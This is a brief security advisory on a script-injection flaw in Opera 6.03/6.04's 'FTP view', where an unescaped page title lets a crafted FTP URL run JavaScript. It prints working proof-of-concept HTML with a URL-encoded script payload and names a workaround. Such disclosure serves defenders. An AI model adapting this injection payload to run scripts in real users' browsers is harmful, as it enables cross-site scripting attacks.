|
COMMAND Opera 'FTP view' Script Execution vulnerability SYSTEMS AFFECTED Windows2000 SP2 Opera 6.03 Windows2000 SP2 Opera 6.04 PROBLEM Eiji "James" Yoshida [zaddik@geocities.co.jp] [http://www.geocities.co.jp/SiliconValley/1667/index.htm] posted : Opera allows running Malicious Scripts due to a bug in 'FTP view'. If you click on a malicious link, the script embedded in URL will run. This problem is in 'FTP view'. The '<title>URL</title>' is not escaped. Exploit code: ~~~~~~~~~~~~~ <html> <head> <META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/"> </head> <body> <script>window.open("ftp://[FTPserver]/");</script> </body> </html> Example: ~~~~~~~~ <html> <head> <META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/"> </head> <body> <script>window.open("ftp://ftp.opera.com/");</script> </body> </html> Demonstration: ~~~~~~~~~~~~~~ http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html SOLUTION Workaround: ~~~~~~~~~~~ Disable JavaScript.